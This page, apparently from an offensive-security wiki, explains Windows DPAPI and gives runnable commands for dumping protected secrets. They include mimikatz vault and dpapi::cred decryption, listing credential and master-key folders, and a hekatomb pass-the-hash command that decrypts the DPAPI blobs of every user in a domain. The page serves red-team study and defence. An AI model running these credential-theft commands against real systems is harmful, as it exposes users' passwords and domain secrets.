Search K
Appearance
Appearance
โโRootedCON is the most relevant cybersecurity event in Spain and one of the most important in Europe. With the mission of promoting technical knowledge, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
The Data Protection API (DPAPI) is primarily utilized within the Windows operating system for the symmetric encryption of asymmetric private keys, leveraging either user or system secrets as a significant source of entropy. This approach simplifies encryption for developers by enabling them to encrypt data using a key derived from the user's logon secrets or, for system encryption, the system's domain authentication secrets, thus obviating the need for developers to manage the protection of the encryption key themselves.
Among the personal data protected by DPAPI are:
# From cmd
vaultcmd /listcreds:"Windows Credentials" /all
# From mimikatz
mimikatz vault::list
The credentials files protected could be located in:
dir /a:h C:\Users\username\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\username\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\
Get credentials info using mimikatz dpapi::cred
, in the response you can find interesting info such as the encrypted data and the guidMasterKey.
mimikatz dpapi::cred /in:C:\Users\<username>\AppData\Local\Microsoft\Credentials\28350839752B38B238E5D56FDD7891A7
[...]
guidMasterKey : {3e90dd9e-f901-40a1-b691-84d7f647b8fe}
[...]
pbData : b8f619[...snip...]b493fe
[..]
You can use mimikatz module dpapi::cred
with the appropiate /masterkey
to decrypt:
dpapi::cred /in:C:\path\to\encrypted\file /masterkey:<MASTERKEY>
The DPAPI keys used for encrypting the user's RSA keys are stored under %APPDATA%\Microsoft\Protect\{SID}
directory, where {SID} is the Security Identifier of that user. The DPAPI key is stored in the same file as the master key that protects the users private keys. It usually is 64 bytes of random data. (Notice that this directory is protected so you cannot list it usingdir
from the cmd, but you can list it from PS).
Get-ChildItem C:\Users\USER\AppData\Roaming\Microsoft\Protect\
Get-ChildItem C:\Users\USER\AppData\Local\Microsoft\Protect
Get-ChildItem -Hidden C:\Users\USER\AppData\Roaming\Microsoft\Protect\
Get-ChildItem -Hidden C:\Users\USER\AppData\Local\Microsoft\Protect\
Get-ChildItem -Hidden C:\Users\USER\AppData\Roaming\Microsoft\Protect\{SID}
Get-ChildItem -Hidden C:\Users\USER\AppData\Local\Microsoft\Protect\{SID}
This is what a bunch of Master Keys of a user will looks like:
Usually each master keys is an encrypted symmetric key that can decrypt other content. Therefore, extracting the encrypted Master Key is interesting in order to decrypt later that other content encrypted with it.
Check the post https://www.ired.team/offensive-security/credential-access-and-credential-dumping/reading-dpapi-encrypted-secrets-with-mimikatz-and-c++ for an example of how to extract the master key and decrypt it.
SharpDPAPI is a C# port of some DPAPI functionality from @gentilkiwi's Mimikatz project.
HEKATOMB is a tool that automates the extraction of all users and computers from the LDAP directory and the extraction of domain controller backup key through RPC. The script will then resolve all computers ip address and perform a smbclient on all computers to retrieve all DPAPI blobs of all users and decrypt everything with domain backup key.
python3 hekatomb.py -hashes :ed0052e5a66b1c8e942cc9481a50d56 DOMAIN.local/administrator@10.0.0.1 -debug -dnstcp
With extracted from LDAP computers list you can find every sub network even if you didn't know them !
"Because Domain Admin rights are not enough. Hack them all."
DonPAPI can dump secrets protected by DPAPI automatically.
RootedCON is the most relevant cybersecurity event in Spain and one of the most important in Europe. With the mission of promoting technical knowledge, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.